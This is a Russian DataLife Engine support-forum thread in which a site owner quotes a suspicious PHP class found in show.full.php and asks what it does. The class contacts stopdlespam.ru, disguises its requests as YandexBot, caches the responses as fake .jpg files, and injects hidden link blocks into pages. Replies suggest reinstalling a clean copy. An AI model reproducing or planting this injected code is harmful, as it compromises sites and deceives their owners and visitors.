Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы по PHP » код PHP в файле show.full.php [stopdlespam] DLE 10.1

код PHP в файле show.full.php [stopdlespam] DLE 10.1


     14.12.2013    Все вопросы » Общие вопросы по PHP    3801

вопрос
Здравствуйте дорогие братья
Настраивал движок наткнулся в файле show.full.php на такой код
идет после строк :
$tpl->set( '[print-link]', "" );
    $tpl->set( '[/print-link]', "" );

        }
        // Ссылки на версию для печати

Сам код:
class Get_links {
    var $host = 'stopdlespam.ru';
    var $path = '/antispam.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;
    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; YandexBot/3.0;  ".$req_url.")";
         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);
        if (function_exists('file_get_contents')) {
            
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);
            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\)(.*?)(\)/', $data, $data);
            return @$data[2];
        }
           return;
      }
      function return_links() {
         $links_class = new Get_links();
         $site_host = md5(str_replace ("www.", "", $_SERVER['HTTP_HOST']));
         $file = 'uploads/posts/thumbs/'.$site_host.'.jpg'; // относительный путь т.е. файл дожен создаваться в папке с шаблоном?
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (isset($_COOKIE['dle_clear'])) {
        return "";
        } elseif (!file_exists($file))
        {   @touch($file, time());
            $data = $links_class->get_remote();
            if (!empty($data)){file_put_contents($file, $data);}
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            if (!empty($data)){file_put_contents($file, $data);}
        } else {
            $array = unserialize(file_get_contents($file));
              if (!empty($array[$_SERVER['REQUEST_URI']])){
            foreach($array[$_SERVER['REQUEST_URI']] as $URI){$data1 .= $URI;}
            return $array['comm'] . $array['start'] . $data1  . $array['end'] . $array['style'];
              }
        }
    }
    }
    $links = new Get_links();

Идет до строк:
if( $row['allow_rate'] ) { 
$tpl->set( '{rating}', ShowRating( $row['id'], $row['rating'], $row['vote_num'], $user_group[$member_id['user_group']]['allow_rating'] ) );
            $tpl->set( '{vote-num}', "".$row['vote_num']."" );
            $tpl->set( '[rating]', "" );
            $tpl->set( '[/rating]', "" );


предчувствие такое что его здесь быть не должно, непонятно за что он отвечает, нагуглил что похожий код был вирус на wordpress. Что за stopdlespam.ru и '/antispam.php' и что куда он пишет? При непосредственом входе на stopdlespam.ru редирект на google поиск.. Заметил что по этому пути $file = 'uploads/posts/thumbs/ в папке thumbs создаются файлы с расширением .jpg но как картинки не открываются никаким просмотрщиком и даже браузером. Разъясните светлые головы что за скрипт, и должен ли он тут быть?

Ответа пока нет


5 комментариев

vitnet
PHP-developer

vitnet - 14 декабря 2013 11:59 -

Скачайте чистый дистрибутив с офф. сайта http://dle-news.ru и не парьте себе мозги

vitnet
PHP-developer

vitnet - 14 декабря 2013 12:21 -


Sander
PHP-developer

Sander - 14 декабря 2013 18:59 -

Вот это то, что я называю бессмысленное применение ООП. Чисто создание класса ради класса.

SanDev.pro - мой блог.

Telegram: @sandev
Skype: Sander8804

Wels
Юзер

Wels - 14 декабря 2013 22:42 -

Нифига не разобрался вобщем в этом скрипте )) Вирезал от греха подальше. Спасибо за ответы. Но всетаки конечно интересно мнение кто разбирается php, - функции скрипта, какие данные он может собирать и прочее.. Может пароль сменить в админке?
vitnet, спасибо за ссылки, но в ваших дистрибутивах кстати
в файле /engine/ajax/pm.php нет куска кода:
$tpl->set( '[online]', "" );
$tpl->set( '[/online]', "" );
$tpl->set_block( "'\\[offline\\](.*?)\\[/offline\\]'si", "" );

что отвечает за вывод онлайн/офлайн статуса юзера в pm
А в engine/ajax/upload.php нет этой строчки:
@header( "Content-type: text/html; charset=" . $config['charset'] );

что отвечает за кодировку сообщений при загрузке файлов на сервер.
И только один Default шаблон вмето трех :)

vitnet
PHP-developer

vitnet - 14 декабря 2013 23:19 -

Цитата: Wels
И только один Default шаблон вместо трех :)

Забыл указать, я себе заливал, вот и удалил их и за ненабностью

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

наверх